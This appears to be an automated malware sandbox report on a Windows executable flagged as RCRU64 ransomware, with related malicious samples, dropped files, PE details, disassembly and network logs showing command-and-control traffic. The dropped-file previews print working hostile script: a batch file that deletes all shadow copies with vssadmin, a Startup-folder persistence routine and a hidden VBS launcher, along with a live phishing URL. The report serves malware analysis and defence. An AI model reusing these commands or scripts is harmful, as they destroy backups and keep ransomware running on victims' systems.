HOSTSLIM-GLOBAL-NETWORKNL | cenSXPimaG.elf | malicious | Mirai, Okiru | 213.166.86.22
HOSTSLIM-GLOBAL-NETWORKNL | SWIFT COPY.exe | malicious | FormBook | 103.214.4.45
HOSTSLIM-GLOBAL-NETWORKNL | REMITTANCE SLIP.exe | malicious | FormBook | 103.214.4.45
HOSTSLIM-GLOBAL-NETWORKNL | STATEMENT OF ACCOUNT.exe | malicious | FormBook | 103.214.4.45
HOSTSLIM-GLOBAL-NETWORKNL | PAYMENT SWIFT.exe | malicious | FormBook | 103.214.4.45
CLOUDFLARENETUS | BiXS3FRoLe.exe | malicious | TrojanRansom | 104.26.13.205
CLOUDFLARENETUS | lEUy79aLAW.exe | malicious | TrojanRansom | 104.26.13.205
CLOUDFLARENETUS | GD8c7ARn8q.exe | malicious | TrojanRansom | 104.26.12.205
CLOUDFLARENETUS | 8AbMCL2dxM.exe | malicious | RCRU64, TrojanRansom | 104.26.12.205
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 104.21.16.9
CLOUDFLARENETUS | https://rnicrosoft-secured-office.squarespace.com/sharepoint?e=test@test.com.au | malicious | HTMLPhisher | 104.21.25.148
CLOUDFLARENETUS | https://i.postimg.cc/y6hBTtv7/png-Hand-SAward.png | malicious | HTMLPhisher | 104.21.85.204
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 172.67.165.166
CLOUDFLARENETUS | phish_alert_sp2_2.0.0.0.eml | malicious | Unknown | 104.18.69.40
CLOUDFLARENETUS | Simple1.exe | malicious | Unknown | 172.67.74.152
                                        No context
                                        No context
                                        Process:C:\Users\user\Desktop\xKvkNk9SXR.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:modified
                                        Size (bytes):12
                                        Entropy (8bit):2.6258145836939115
                                        Encrypted:false
                                        SSDEEP:3:fuM9:2I
                                        MD5:E4A5E3AE7A904A86A50AE5FC1A38F374
                                        SHA1:0B536BF59DE491CCC2CAA8AE52200CD6B61364E9
                                        SHA-256:4EF53CF7C95DBE1BE9AC5E3D7465B91B911FD5C198EB161A55AF5579D9390C1A
                                        SHA-512:17D3508E7E847B91E84A06BA32BAD9A6CEC55373EE877E1163AB74EF4E18A72C38DD43897BE21E26556CBDE58DF9446E06B59B2BB37CC0321B5228D57C80A146
                                        Malicious:false
                                        Preview:8.46.123.228
                                        Process:C:\Users\user\Desktop\xKvkNk9SXR.exe
                                        File Type:ASCII text, with very long lines (3460), with no line terminators
                                        Category:dropped
                                        Size (bytes):3460
                                        Entropy (8bit):6.010788731170718
                                        Encrypted:false
                                        SSDEEP:48:oCXvu0S5t8mhjt/VgCwcU9ytwDJ215enxwTzukpGd2lNk3nQ0qiozhlhxaXNBa0A:o8Ohx/wbewAmnIzuk0qNK8jhx8y0U9
                                        MD5:82344D5ED357A7C9F68991E642B6D283
                                        SHA1:8DAB2025878FD47D6DBF7C970202DEFD7EF351CD
                                        SHA-256:38C535FC2963F1B4C64F790D4112516F6B6AD907919F9167C9EA5FE72302F35D
                                        SHA-512:FD65453CC700490754B36645A887B99368A1CD2435070A36F747C6A9D3345AB43357064CBFF23A00F9DD4E755AEED55CAF4041BBFED063C83B46194C7EB49016
                                        Malicious:true
                                        Preview:$0h7MpNSgTlFd3CRFSNVV30N5lvtYn+mR30/wxgHkFxD8SnscMZkcQ0CViOasEL9mrbxO0UUMQ8gPFdBVZcr/HxvFkyuRS85evrDvtqa+ZIG9OlCV24Hf7w1cIwUrw4//hrNrFY6URO8t921Xin7G2UgSMXHPg9ira56JJ2G7NKD8XI3JHJze4+e8VJJ698/s4YzYlnKzTVZqSDzVdD9tCZM6xiB1LJVN6H1anciZbmisx/8wvlgMTJ8nIvGFJ+sDN2YmlizIwhA0uubAz76zgaT9SrxT7LoiiOp1W0/AaV8yuliO19yUvai3rZkrUgDASeS/gLYemH/o9TsOUKHjY1g==$1aysHVjBo1PNR3hucfExZ7TSy+tz+kgmYijzH+6ZLuQ8qKdJ0eGQfD7vX3aa+FAraVDziStYq4aFDSVorV4XEYSXoM5M+lQKh+H8+dSfRLmxF0SPlZbWtLFSQ8JY/vqYGWy08IhrgV3ZifmRJvMRJuB/irVW13mB7nogMTR/hn5jSE3nTuVlkNcFbERTjFEGuQgj04O/q6RwQsX0o4znLnhhWbmDej6UuFjdknL5MWo1wwnVOlxUQG0BrU14JnXssTJoMHpNHmHUlaJtS44ZzT/8yEhdcORBVqXYx67OejNITs4snHkHVtqFsMLS/kneCqRL7Ajas9U8yWXVbDOSVJQ==$2Jn5H7zJQuRVkH4nq19OCO05SjgMwIEkKhcLxAxE8kfG6KON/d5rrLO5/IrI2gAe4Fd2F/HPzbwJmC8hdzKNJv+q4GVMi5qYUDcHtNmJiE7iQ/n7QniliCOTg1HtpV24uNaVGchyF4MEnEJ6GNZEDS75LaG+60/YdQqrCoDvESwIsAd8D7qW//7DTbAnyzUA4o0rWJ9pklElfY9OOzMo8OIOBTlFgEiSRxINqXhu4JuupDBjuf+7W4oDJchSRM6+vf6tg12i2g81USm0AGOr42taa+7Mg6WMTz5zQ7ZTiC56Ca20kYM
                                        Process:C:\Users\user\Desktop\xKvkNk9SXR.exe
                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1257984
                                        Entropy (8bit):6.58800049787178
                                        Encrypted:false
                                        SSDEEP:24576:5ZqLyIjsi3CKrjp51iKT1gI0WSRuTxy087a2bJtMlLE7hUEPBUTIG+u4:aLfnCKrj8C1wRuTxaamM27hU4BUTIG+t
                                        MD5:603B398C14FFC8C0B647C58E9886C557
                                        SHA1:58B80929A19CFB40C683CC10F5C8167E5543C553
                                        SHA-256:2619065D71A290AD0369CB3C19F1D5A58C43BF7ABB52FB8828727483D32BDCF7
                                        SHA-512:A761820DF0CC415E2ED6637359788B3C6CE020F6097DB3DDA1FB3FAE64CBA38A72D9BE9359A273DE11F26B67264853DE22A7F7D9B82E56A776D9EEF58D379A32
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 82%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Jid.+.7.+.7.+.7,..7.+.7,..7++.7,..7.+.7,A.6.+.7,A.6.+.7,A.6.+.7.S.7.+.7.+.7A+.7.@.6.+.7.@.6.+.7.@.7.+.7.@.6.+.7Rich.+.7................PE..L......e............................1........0....@.......................................@.................................D....................................... V..p...................4W.......V..@............0..(............................text............................... ..`.rdata.......0......................@..@.data...x...........................@....rsrc................X..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\Desktop\xKvkNk9SXR.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0
                                        Process:C:\Users\user\Desktop\xKvkNk9SXR.exe
                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):138
                                        Entropy (8bit):4.970414275542141
                                        Encrypted:false
                                        SSDEEP:3:mKDD/j2hFHTnmTPcYWA6/hEREVdPTHAF6vWEzn9TmTPcYWA6/hEREVdPTHAoU:hGh9TnmTPYA6/Si3rHV7TQTPYA6/Si36
                                        MD5:82A528CBF39B8EA7E2982E7B2305204C
                                        SHA1:717836E0E2B304ED7AE239CC1DB0F6F80E0419B1
                                        SHA-256:616738526C38E04F992B7B9FC60CB7FEB3EE416BF47B69AA2C3A5F1A722A653B
                                        SHA-512:EFF7654E171DBD9BC471718A7E14EE3C84A9EDF948F4C8863C8107E653BE8BA06BC7A2876D506D6E4AE7EF2280E820D04615EBCD88894EF01B3667D070241DB3
                                        Malicious:true
                                        Preview:@echo off..IF EXIST "%SystemDrive%\Users\%username%\AppData\S-8459.vbs" (..start "" "%SystemDrive%\Users\%username%\AppData\S-8459.vbs"..)
                                        Process:C:\Users\user\Desktop\xKvkNk9SXR.exe
                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1849
                                        Entropy (8bit):5.3709338878779285
                                        Encrypted:false
                                        SSDEEP:48:NKsDnhnuYWnui9UEq5uhnuYWnuiGhnuYZacAXuknc4hg0hLdY:77kYliZqIkYliGkYZacAXuWBJnY
                                        MD5:9AE1F609F673BDC393BAD21D61A353DD
                                        SHA1:2F01C120D521280FA6A9833DBF905315307F2ED5
                                        SHA-256:05398841066ECC9AFBDA9706204511F6361E76100B3FD97D5B9A66A15D4F5292
                                        SHA-512:0E9487CF3874CE04AEA1B8282C0C6F4D524F149F2B39BC2AEC15943858E9A7176506CA956E0CA03A93095BFB3DAD4216A0A3D32A8F9B22C11FA50B1F6E31C15C
                                        Malicious:true
                                        Preview:@echo off..tasklist /v | find /I /c "dcdcf" > nul..if "%ERRORLEVEL%" == "0" goto ErrorAlreadyRunning..set lend=deb..vssadmin.exe Delete Shadows /All /Quiet..title dcdcf..goto notend..:ErrorAlreadyRunning..exit..:secthree..tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv 2>NUL | find /I "xKvkNk9SXR.exe">NUL..if "%ERRORLEVEL%"=="0" goto imer..if %lend% == bed (goto akakak)..set lend=bed..IF EXIST "%SystemDrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" (..start /d "%SystemDrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\" Xinfecter.exe ..)..:secttwo..tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv 2>NUL | find /I "xKvkNk9SXR.exe">NUL..if "%ERRORLEVEL%"=="0" goto notend..goto secton..:notend..timeout /t 15 /nobreak >NUL..IF NOT EXIST "C:\Users\ReadMe.hta" (..goto secttwo..:secton..IF EXIST "%SystemDrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe"
                                        Process:C:\Users\user\Desktop\xKvkNk9SXR.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):686
                                        Entropy (8bit):5.1743757294368
                                        Encrypted:false
                                        SSDEEP:12:MDhOfTK2Opx6/SYSHFagnXoWHgvvT9vTnMS8h92Mbx6/SYTlZ7D:s6f9/SY7UgDVnMS8j2Mbs/SYTlZH
                                        MD5:ED7A274FF8AC640416952BFB5D6C927A
                                        SHA1:6B33CD5B39DB6E9A900336E446F64A137F0A0F42
                                        SHA-256:4D68E4A7A437EB4A7AD9C7B28BDDA894A68AE41EFBA8A5E4D3A6A930BEBFEEA5
                                        SHA-512:8F3A4F071550AFE716C5D39601CF1E8559084FBB701E95B28EB7685FED6D8A972E662AD19124A2242FD30C291B8DD1F18F1A2DCF56AC6C98F2BF96BAC91510F3
                                        Malicious:true
                                        Preview:Dim strScript..Dim oExec, oWshShell..Dim ComSpec..Set oWshShell = CreateObject("WScript.Shell")..ComSpec = oWshShell.ExpandEnvironmentStrings("%comspec%")..strScript = ComSpec & " /C echo %SystemDrive%\Users\%username%\AppData\S-6748.bat"..Set oExec = oWshShell.Exec (strScript)..Dim outputsxc..outputsxc = oExec.StdOut.ReadAll()..Set fso = CreateObject("Scripting.FileSystemObject")..outputsxc = Replace(outputsxc, vbCr, "")..outputsxc = Replace(outputsxc, vbLf, "")..If (fso.FileExists(outputsxc)) Then..Set WinScriptHost = CreateObject("WScript.Shell")..WinScriptHost.Run Chr(34) & "%SystemDrive%\Users\%username%\AppData\S-6748.bat" & Chr(34), 0..Set WinScriptHost = Nothing..End If
                                        Process:C:\Users\user\Desktop\xKvkNk9SXR.exe
                                        File Type:ASCII text, with very long lines (417), with no line terminators
                                        Category:dropped
                                        Size (bytes):417
                                        Entropy (8bit):5.8525165124852
                                        Encrypted:false
                                        SSDEEP:12:BwSx4B3dXYPR/+GBVMnnwGnzZkSLjptQU:B78dXgJfMnwCeY/QU
                                        MD5:A17C6F22EFD9EB6B574F136E1E75542C
                                        SHA1:7683FB934B32EE38D6FEE7537B60D0B059C89338
                                        SHA-256:310DCFA92A0F5B726EAA8CB182056B53C3BED1276670A8EE0D6343FF3FA49FC8
                                        SHA-512:4A80E1921040C5BA876233D5F357D168FF5756D8610AEC9F0AD4E90E8A588E24A194202BADD0524455124E6C4CC9A79405EE1272BEDFD9DE1D3C674B95EA4054
                                        Malicious:true
                                        Preview:n7t0MIIBIDANBgkqhkiG9w0BAQEFAAOCAQ0AMIIBCAKCAQEAqulXntwvCFZt2AesTGv2lgODHIsS+VbDDGxMsygP52f8weqcoqF928ZSm6K+FFbZoV02TfQh61KWSCyFgotz72QWkoV+dJB4p1a4TZIR5eGo5ZqnwX6NhYKUnQBQjubADaE/dN1zlqFxCt2uxmYCVD8YrU0hR24WBd0aLF/3vcupEpu2ZKzrXuuK6/dPFlQbFSeEYRpvFWgdYKBfjq/BFP/FIHmrTPcdwchgGG1guRBLVuugSkm1ccxhpXDO15C8BiW/meAZTumQ4vGhqQ7hEPASDqnH+pom7AsO+iDH8fQoUAWWiLP1SSKdYxEcA+1dA1f7H81Rj+3aFAzYgLFcCwIBEQ==p2h6INW15u4g8.PBFh2gq
                                        Process:C:\Windows\SysWOW64\find.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):50
                                        Entropy (8bit):4.484372820753982
                                        Encrypted:false
                                        SSDEEP:3:SOXaAdiJSdupkSIv:SOdkpkRv
                                        MD5:78509DDB3CB5A0D31A20C36AC125F083
                                        SHA1:BEF06A265B2C07275F37B3BB1B9A0E6F891A2471
                                        SHA-256:0DB66FF0E90D17608BB004A1D9642C85BD2FDBA64FEBD0E4DDA1A216BF9ACC8A
                                        SHA-512:FF5F3361F9D49A60CBDFBBBDEA3344285B783183C630A2F82772EFF68138F3CD80C15584C006B1142C0EE0BB589473684BB37133A874382D822510B722DA949F
                                        Malicious:false
                                        Preview:"xKvkNk9SXR.exe","7032","Console","1","15'624 K"..
                                        File type:PE32 executable (console) Intel 80386, for MS Windows
                                        Entropy (8bit):6.58800049787178
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:xKvkNk9SXR.exe
                                        File size:1'257'984 bytes
                                        MD5:603b398c14ffc8c0b647c58e9886c557
                                        SHA1:58b80929a19cfb40c683cc10f5c8167e5543c553
                                        SHA256:2619065d71a290ad0369cb3c19f1d5a58c43bf7abb52fb8828727483d32bdcf7
                                        SHA512:a761820df0cc415e2ed6637359788b3c6ce020f6097db3dda1fb3fae64cba38a72d9be9359a273de11f26b67264853de22a7f7d9b82e56a776d9eef58d379a32
                                        SSDEEP:24576:5ZqLyIjsi3CKrjp51iKT1gI0WSRuTxy087a2bJtMlLE7hUEPBUTIG+u4:aLfnCKrj8C1wRuTxaamM27hU4BUTIG+t
                                        TLSH:DD45BE307542C132D56181F05E7CEBAA90ACBD384F758ACBB3D46B2E4A315D25E36E63
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Jid.+.7.+.7.+.7,..7.+.7,..7++.7,..7.+.7,A.6.+.7,A.6.+.7,A.6.+.7.S.7.+.7.+.7A+.7.@.6.+.7.@.6.+.7.@.7.+.7.@.6.+.7Rich.+.7.......
                                        Icon Hash:00928e8e8686b000
                                        Entrypoint:0x490f31
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows cui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x6515E0CF [Thu Sep 28 20:23:43 2023 UTC]
                                        TLS Callbacks:0x490570
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:1
                                        File Version Major:5
                                        File Version Minor:1
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:1
                                        Import Hash:f527e8080fac9432953c548a4f7317af
                                        Instruction
                                        call 00007FAA7CAB6E07h
                                        jmp 00007FAA7CAB5F89h
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        cmp cl, 00000040h
                                        jnc 00007FAA7CAB6127h
                                        cmp cl, 00000020h
                                        jnc 00007FAA7CAB6118h
                                        shrd eax, edx, cl
                                        shr edx, cl
                                        ret
                                        mov eax, edx
                                        xor edx, edx
                                        and cl, 0000001Fh
                                        shr eax, cl
                                        ret
                                        xor eax, eax
                                        xor edx, edx
                                        ret
                                        int3
                                        push esi
                                        mov eax, dword ptr [esp+14h]
                                        or eax, eax
                                        jne 00007FAA7CAB613Ah
                                        mov ecx, dword ptr [esp+10h]
                                        mov eax, dword ptr [esp+0Ch]
                                        xor edx, edx
                                        div ecx
                                        mov ebx, eax
                                        mov eax, dword ptr [esp+08h]
                                        div ecx
                                        mov esi, eax
                                        mov eax, ebx
                                        mul dword ptr [esp+10h]
                                        mov ecx, eax
                                        mov eax, esi
                                        mul dword ptr [esp+10h]
                                        add edx, ecx
                                        jmp 00007FAA7CAB6159h
                                        mov ecx, eax
                                        mov ebx, dword ptr [esp+10h]
                                        mov edx, dword ptr [esp+0Ch]
                                        mov eax, dword ptr [esp+08h]
                                        shr ecx, 1
                                        rcr ebx, 1
                                        shr edx, 1
                                        rcr eax, 1
                                        or ecx, ecx
                                        jne 00007FAA7CAB6106h
                                        div ebx
                                        mov esi, eax
                                        mul dword ptr [esp+14h]
                                        mov ecx, eax
                                        mov eax, dword ptr [esp+10h]
                                        mul esi
                                        add edx, ecx
                                        jc 00007FAA7CAB6120h
                                        cmp edx, dword ptr [esp+0Ch]
                                        jnbe 00007FAA7CAB611Ah
                                        jc 00007FAA7CAB6121h
                                        cmp eax, dword ptr [esp+08h]
                                        jbe 00007FAA7CAB611Bh
                                        dec esi
                                        sub eax, dword ptr [esp+10h]
                                        sbb edx, dword ptr [esp+14h]
                                        xor ebx, ebx
                                        sub eax, dword ptr [esp+08h]
                                        sbb edx, dword ptr [esp+0Ch]
                                        neg edx
                                        neg eax
                                        sbb edx, 00000000h
                                        mov ecx, edx
                                        mov edx, ebx
                                        mov ebx, ecx
                                        mov ecx, eax
                                        mov eax, esi
                                        pop esi
                                        retn 0010h
                                        int3
                                        int3
                                        int3
                                        Programming Language:
                                        • [IMP] VS2008 SP1 build 30729
                                         Name | Virtual Address | Virtual Size | Is in Section
                                         IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_IMPORT | 0x11da44 | 0xb4 | .rdata
                                         IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x130000 | 0x1e0 | .rsrc
                                         IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x131000 | 0xd71c | .reloc
                                         IMAGE_DIRECTORY_ENTRY_DEBUG | 0x105620 | 0x70 | .rdata
                                         IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_TLS | 0x105734 | 0x18 | .rdata
                                         IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x105690 | 0x40 | .rdata
                                         IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_IAT | 0xe3000 | 0x328 | .rdata
                                         IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                         Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                         .text | 0x1000 | 0xe12e6 | 0xe1400 | c0c638d3c7236d1276c4801b4e4af971 | False | 0.45993058927580466 | zlib compressed data | 6.644423107346062 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                         .rdata | 0xe3000 | 0x3bc88 | 0x3be00 | 204389296771c0cb4c3485188f1b8413 | False | 0.39400525182672236 | data | 5.008672243547162 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                         .data | 0x11f000 | 0x10778 | 0x8200 | 9c5a7f4cd5cc334c6c554a46a0cc5c46 | False | 0.1565204326923077 | data | 4.83200775535347 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                         .rsrc | 0x130000 | 0x1e0 | 0x200 | 319e7ac1640c4d053129c81ac0038351 | False | 0.52734375 | data | 4.701503258251789 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                         .reloc | 0x131000 | 0xd71c | 0xd800 | ecd90901d384aab5cedc091734e4b682 | False | 0.5701497395833334 | data | 6.574336043075699 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                         Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                         RT_MANIFEST | 0x130060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
                                         DLL | Import
                                         KERNEL32.dll | Sleep, FormatMessageW, GetLastError, SetEvent, GetDiskFreeSpaceExW, GetCurrentThread, WaitForSingleObjectEx, CloseHandle, HeapAlloc, GetLogicalDriveStringsA, GetProcAddress, SetFilePointerEx, LocalFree, GetFileSize, GetProcessHeap, GlobalMemoryStatusEx, MultiByteToWideChar, CopyFileW, WideCharToMultiByte, GetConsoleWindow, FormatMessageA, CreateSemaphoreA, CreateEventA, lstrcmpW, SetConsoleTitleW, SetLastError, QueryPerformanceCounter, QueryPerformanceFrequency, GetThreadTimes, WriteConsoleW, SetStdHandle, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetComputerNameExW, GetSystemDirectoryW, GetFileAttributesW, CreateFileW, LocalAlloc, FindClose, WaitForMultipleObjectsEx, SetFilePointer, SetErrorMode, GetModuleFileNameW, WriteFile, ReleaseSemaphore, GetCurrentProcess, FindNextFileW, HeapFree, FindFirstFileW, ReadFile, GetModuleHandleW, CreateDirectoryW, GetEnvironmentStringsW, GetOEMCP, IsValidCodePage, FindNextFileA, FindFirstFileExA, GetTimeZoneInformation, HeapSize, HeapReAlloc, ReadConsoleW, CreatePipe, GetExitCodeProcess, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileType, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, GetACP, GetCommandLineW, GetStringTypeW, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, DeleteCriticalSection, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, EncodePointer, DecodePointer, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, DeleteFileW, GetFileAttributesExW, SetEndOfFile, DeviceIoControl, MoveFileExW, AreFileApisANSI, ResetEvent, OpenEventA, SetWaitableTimer, GetCurrentProcessId, ResumeThread, GetLogicalProcessorInformation, GetModuleHandleA, CreateWaitableTimerA, InitializeSListHead, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsDebuggerPresent, GetStartupInfoW, SignalObjectAndWait, CreateThread, SetThreadPriority, GetThreadPriority, CreateTimerQueueTimer, ChangeTimerQueueTimer, DeleteTimerQueueTimer, GetNumaHighestNodeNumber, GetProcessAffinityMask, SetThreadAffinityMask, RegisterWaitForSingleObject, UnregisterWait, FreeLibrary, FreeLibraryAndExitThread, LoadLibraryExW, GetVersionExW, VirtualAlloc, VirtualProtect, VirtualFree, DuplicateHandle, InterlockedPopEntrySList, InterlockedPushEntrySList, InterlockedFlushSList, QueryDepthSList, UnregisterWaitEx, CreateTimerQueue, LoadLibraryW, WaitForSingleObject, RtlUnwind, RaiseException, ExitProcess, GetModuleHandleExW, CreateProcessA, ExitThread, GetModuleFileNameA, GetStdHandle, GetCommandLineA
                                         USER32.dll | EnumWindows, GetWindowTextA, ShowWindow, GetWindowTextLengthA
                                         ADVAPI32.dll | CryptGenRandom, CryptReleaseContext, CryptAcquireContextA, SetSecurityDescriptorDacl, AccessCheck, SetSecurityDescriptorOwner, AllocateAndInitializeSid, IsValidSecurityDescriptor, OpenProcessToken, FreeSid, InitializeSecurityDescriptor, InitializeAcl, DuplicateToken, GetLengthSid, GetUserNameW, AddAccessAllowedAce, OpenThreadToken, SetSecurityDescriptorGroup
                                         SHELL32.dll | ShellExecuteW
                                         WS2_32.dll | htons, recv, connect, socket, send, WSAStartup, closesocket, WSACleanup, gethostbyname
                                         SHLWAPI.dll | PathIsNetworkPathA
                                         NETAPI32.dll | NetUserEnum, DsRoleGetPrimaryDomainInformation, NetApiBufferFree
                                         WININET.dll | HttpOpenRequestW, HttpSendRequestW, InternetOpenW, InternetReadFile, InternetConnectW
                                         Language of compilation system | Country where language is spoken | Map
                                         English | United States
                                         Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                         2024-12-06T13:51:12.165027+0100 | 2045821 | ET MALWARE [ANY.RUN] RCRU64 Ransomware Variant CnC Activity | 1 | 192.168.2.5 | 49705 | 185.147.34.53 | 3586 | TCP
                                         Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                         Dec 6, 2024 13:51:22.142662048 CET | 49704 | 80 | 192.168.2.5 | 104.26.12.205
                                         Dec 6, 2024 13:51:22.262693882 CET | 80 | 49704 | 104.26.12.205 | 192.168.2.5
                                         Dec 6, 2024 13:51:22.262808084 CET | 49704 | 80 | 192.168.2.5 | 104.26.12.205
                                         Dec 6, 2024 13:51:22.269814968 CET | 49704 | 80 | 192.168.2.5 | 104.26.12.205
                                         Dec 6, 2024 13:51:22.389632940 CET | 80 | 49704 | 104.26.12.205 | 192.168.2.5
                                         Dec 6, 2024 13:51:23.362533092 CET | 80 | 49704 | 104.26.12.205 | 192.168.2.5
                                         Dec 6, 2024 13:51:23.362627983 CET | 49704 | 80 | 192.168.2.5 | 104.26.12.205
                                         Dec 6, 2024 13:51:23.547281981 CET | 49705 | 3586 | 192.168.2.5 | 185.147.34.53
                                         Dec 6, 2024 13:51:23.667259932 CET | 3586 | 49705 | 185.147.34.53 | 192.168.2.5
                                         Dec 6, 2024 13:51:23.667334080 CET | 49705 | 3586 | 192.168.2.5 | 185.147.34.53
                                         Dec 6, 2024 13:51:24.649317026 CET | 49705 | 3586 | 192.168.2.5 | 185.147.34.53
                                         Dec 6, 2024 13:51:24.769205093 CET | 3586 | 49705 | 185.147.34.53 | 192.168.2.5
                                         Dec 6, 2024 13:51:24.769362926 CET | 49705 | 3586 | 192.168.2.5 | 185.147.34.53
                                         Dec 6, 2024 13:51:24.769475937 CET | 49705 | 3586 | 192.168.2.5 | 185.147.34.53
                                         Dec 6, 2024 13:51:24.889878988 CET | 3586 | 49705 | 185.147.34.53 | 192.168.2.5
                                         Dec 6, 2024 13:51:24.890341043 CET | 3586 | 49705 | 185.147.34.53 | 192.168.2.5
                                         Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                         Dec 6, 2024 13:51:21.966609955 CET | 54321 | 53 | 192.168.2.5 | 1.1.1.1
                                         Dec 6, 2024 13:51:22.103857040 CET | 53 | 54321 | 1.1.1.1 | 192.168.2.5
                                         Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                         Dec 6, 2024 13:51:21.966609955 CET | 192.168.2.5 | 1.1.1.1 | 0x16a2 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
                                         Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                         Dec 6, 2024 13:51:22.103857040 CET | 1.1.1.1 | 192.168.2.5 | 0x16a2 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
                                         Dec 6, 2024 13:51:22.103857040 CET | 1.1.1.1 | 192.168.2.5 | 0x16a2 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
                                         Dec 6, 2024 13:51:22.103857040 CET | 1.1.1.1 | 192.168.2.5 | 0x16a2 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
                                        • api.ipify.org
                                        • 185.147.34.53
                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                         0 | 192.168.2.5 | 49704 | 104.26.12.205 | 80 | 7032 | C:\Users\user\Desktop\xKvkNk9SXR.exe
